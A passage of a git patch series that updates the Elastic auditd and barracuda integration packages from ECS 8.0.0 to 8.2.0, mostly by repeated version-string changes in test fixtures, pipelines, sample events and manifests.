a/packages/auditd/data_stream/log/_dev/test/pipeline/test-truncated-execve.log-expected.json +++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-truncated-execve.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", @@ -36,7 +36,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", @@ -131,7 +131,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", @@ -226,7 +226,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", diff --git a/packages/auditd/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/auditd/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 53f66a34c3c..2e9667ee3d6 100644 --- a/packages/auditd/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/auditd/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -3,7 +3,7 @@ description: Pipeline for parsing Linux auditd logs processors: - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/auditd/data_stream/log/sample_event.json b/packages/auditd/data_stream/log/sample_event.json index cc57adeb1a8..d85019365e9 100644 --- a/packages/auditd/data_stream/log/sample_event.json +++ b/packages/auditd/data_stream/log/sample_event.json @@ -19,7 +19,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/auditd/docs/README.md b/packages/auditd/docs/README.md index a7d1918ba6a..3ff78af30d6 100644 --- a/packages/auditd/docs/README.md +++ b/packages/auditd/docs/README.md @@ -38,7 +38,7 @@ An example event for `log` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/auditd/manifest.yml b/packages/auditd/manifest.yml index dea602c2bb1..43666debb31 100644 --- a/packages/auditd/manifest.yml +++ b/packages/auditd/manifest.yml @@ -1,6 +1,6 @@ name: auditd title: Auditd -version: 2.1.0 +version: 2.2.0 release: ga description: Collect logs from Linux audit daemon with Elastic Agent. type: integration From 041501de21d1ccd7ba957e39aa0372396beec0ae Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 13:06:40 -0600 Subject: [PATCH 07/23] Update barracuda to ECS 8.2 --- packages/barracuda/_dev/build/build.yml | 2 +- packages/barracuda/changelog.yml | 5 + .../pipeline/test-generated.log-expected.json | 200 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../spamfirewall/sample_event.json | 2 +- .../pipeline/test-generated.log-expected.json | 200 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/waf/sample_event.json | 4 +- packages/barracuda/manifest.yml | 2 +- 9 files changed, 212 insertions(+), 207 deletions(-) diff --git a/packages/barracuda/_dev/build/build.yml b/packages/barracuda/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/barracuda/_dev/build/build.yml +++ b/packages/barracuda/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/barracuda/changelog.yml b/packages/barracuda/changelog.yml index 24bf66ee141..4cf9fa88f2d 100644 --- a/packages/barracuda/changelog.yml +++ b/packages/barracuda/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.9.0" + changes: + - description: Update to ECS 8.2.0 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.8.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json index 7d4da0e69cf..697493e060b 100644 --- a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361565502Z" @@ -14,7 +14,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361569329Z" @@ -26,7 +26,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361570529Z" @@ -38,7 +38,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361571721Z" @@ -50,7 +50,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361572753Z" @@ -62,7 +62,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361573772Z" @@ -74,7 +74,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361574712Z" @@ -86,7 +86,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361575670Z" @@ -98,7 +98,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361576607Z" @@ -110,7 +110,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361577549Z" @@ -122,7 +122,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361578570Z" @@ -134,7 +134,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361579751Z" @@ -146,7 +146,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361580718Z" @@ -158,7 +158,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361581686Z" @@ -170,7 +170,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361582624Z" @@ -182,7 +182,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361583565Z" @@ -194,7 +194,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361584711Z" @@ -206,7 +206,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361585679Z" @@ -218,7 +218,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361586643Z" @@ -230,7 +230,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361587593Z" @@ -242,7 +242,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361588531Z" @@ -254,7 +254,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361589473Z" @@ -266,7 +266,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361590399Z" @@ -278,7 +278,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361591519Z" @@ -290,7 +290,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361592459Z" @@ -302,7 +302,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361593404Z" @@ -314,7 +314,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361594346Z" @@ -326,7 +326,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361595291Z" @@ -338,7 +338,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361596263Z" @@ -350,7 +350,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361597225Z" @@ -362,7 +362,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361598182Z" @@ -374,7 +374,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361599134Z" @@ -386,7 +386,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361600080Z" @@ -398,7 +398,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361601018Z" @@ -410,7 +410,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361602118Z" @@ -422,7 +422,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361603131Z" @@ -434,7 +434,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361604068Z" @@ -446,7 +446,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361605014Z" @@ -458,7 +458,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361605945Z" @@ -470,7 +470,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361606917Z" @@ -482,7 +482,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361607869Z" @@ -494,7 +494,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361688315Z" @@ -506,7 +506,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361722930Z" @@ -518,7 +518,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361725661Z" @@ -530,7 +530,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361727053Z" @@ -542,7 +542,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361728052Z" @@ -554,7 +554,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361729089Z" @@ -566,7 +566,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361730068Z" @@ -578,7 +578,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361731044Z" @@ -590,7 +590,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361732070Z" @@ -602,7 +602,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361733219Z" @@ -614,7 +614,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361734177Z" @@ -626,7 +626,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361735114Z" @@ -638,7 +638,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361736066Z" @@ -650,7 +650,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361737020Z" @@ -662,7 +662,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361741215Z" @@ -674,7 +674,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361742249Z" @@ -686,7 +686,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361743231Z" @@ -698,7 +698,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361744211Z" @@ -710,7 +710,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361745168Z" @@ -722,7 +722,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361792198Z" @@ -734,7 +734,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361795559Z" @@ -746,7 +746,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361797321Z" @@ -758,7 +758,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361817089Z" @@ -770,7 +770,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361818986Z" @@ -782,7 +782,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361820077Z" @@ -794,7 +794,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361821091Z" @@ -806,7 +806,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361822059Z" @@ -818,7 +818,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361823014Z" @@ -830,7 +830,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361824315Z" @@ -842,7 +842,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361825279Z" @@ -854,7 +854,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361826354Z" @@ -866,7 +866,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361827298Z" @@ -878,7 +878,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361828249Z" @@ -890,7 +890,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361829553Z" @@ -902,7 +902,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361830537Z" @@ -914,7 +914,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361831513Z" @@ -926,7 +926,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361832483Z" @@ -938,7 +938,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361833441Z" @@ -950,7 +950,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361834383Z" @@ -962,7 +962,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361835393Z" @@ -974,7 +974,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361836382Z" @@ -986,7 +986,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361837316Z" @@ -998,7 +998,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361838269Z" @@ -1010,7 +1010,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361839233Z" @@ -1022,7 +1022,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361840212Z" @@ -1034,7 +1034,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361841159Z" @@ -1046,7 +1046,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361842186Z" @@ -1058,7 +1058,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361843187Z" @@ -1070,7 +1070,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361844147Z" @@ -1082,7 +1082,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361845079Z" @@ -1094,7 +1094,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361846118Z" @@ -1106,7 +1106,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361847068Z" @@ -1118,7 +1118,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361848014Z" @@ -1130,7 +1130,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361849083Z" @@ -1142,7 +1142,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361850035Z" @@ -1154,7 +1154,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.361851031Z" @@ -1166,7 +1166,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.362046275Z" @@ -1178,7 +1178,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.362049328Z" @@ -1190,7 +1190,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:54:29.362050532Z" diff --git a/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml b/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml index 7aacfed138f..1866136294a 100644 --- a/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml +++ b/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/barracuda/data_stream/spamfirewall/sample_event.json b/packages/barracuda/data_stream/spamfirewall/sample_event.json index 9ddce9b0791..af43a5d2b9e 100644 --- a/packages/barracuda/data_stream/spamfirewall/sample_event.json +++ b/packages/barracuda/data_stream/spamfirewall/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json index 8c88eca0147..9475ba22fe1 100644 --- a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417884657Z" @@ -14,7 +14,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417887946Z" @@ -26,7 +26,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417889122Z" @@ -38,7 +38,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417890097Z" @@ -50,7 +50,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417891067Z" @@ -62,7 +62,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417891979Z" @@ -74,7 +74,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417892883Z" @@ -86,7 +86,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417893807Z" @@ -98,7 +98,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417894740Z" @@ -110,7 +110,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417895641Z" @@ -122,7 +122,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417896546Z" @@ -134,7 +134,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417897693Z" @@ -146,7 +146,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417898673Z" @@ -158,7 +158,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417899677Z" @@ -170,7 +170,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417900601Z" @@ -182,7 +182,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417901525Z" @@ -194,7 +194,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417902606Z" @@ -206,7 +206,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417903535Z" @@ -218,7 +218,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417904455Z" @@ -230,7 +230,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417905395Z" @@ -242,7 +242,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417906312Z" @@ -254,7 +254,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417907225Z" @@ -266,7 +266,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417908129Z" @@ -278,7 +278,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417909320Z" @@ -290,7 +290,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417910284Z" @@ -302,7 +302,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417911221Z" @@ -314,7 +314,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417912116Z" @@ -326,7 +326,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417913011Z" @@ -338,7 +338,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417913918Z" @@ -350,7 +350,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417914898Z" @@ -362,7 +362,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417915807Z" @@ -374,7 +374,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417916724Z" @@ -386,7 +386,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417917630Z" @@ -398,7 +398,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417918595Z" @@ -410,7 +410,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417919656Z" @@ -422,7 +422,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417920572Z" @@ -434,7 +434,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417921507Z" @@ -446,7 +446,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417922412Z" @@ -458,7 +458,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417923313Z" @@ -470,7 +470,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417924223Z" @@ -482,7 +482,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417925124Z" @@ -494,7 +494,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417926024Z" @@ -506,7 +506,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417926929Z" @@ -518,7 +518,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417927859Z" @@ -530,7 +530,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417928768Z" @@ -542,7 +542,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417929668Z" @@ -554,7 +554,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417930593Z" @@ -566,7 +566,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417931502Z" @@ -578,7 +578,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417932414Z" @@ -590,7 +590,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417933332Z" @@ -602,7 +602,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417934450Z" @@ -614,7 +614,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417935408Z" @@ -626,7 +626,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417936325Z" @@ -638,7 +638,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417937315Z" @@ -650,7 +650,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417938223Z" @@ -662,7 +662,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { 